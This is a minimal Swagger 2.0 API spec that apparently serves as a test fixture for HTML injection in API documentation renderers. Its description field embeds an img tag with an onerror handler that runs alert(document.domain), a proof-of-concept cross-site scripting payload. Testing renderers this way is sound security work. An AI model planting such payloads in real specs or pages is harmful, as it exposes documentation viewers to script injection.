swagger: '2.0'
info:
  version: 1.0.0
  title: HTML Injection IMG injected
  description: >
    <h1>HTML Injection : IMG injected</h1>
    <img src=x onerror="alert(document.domain)">
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
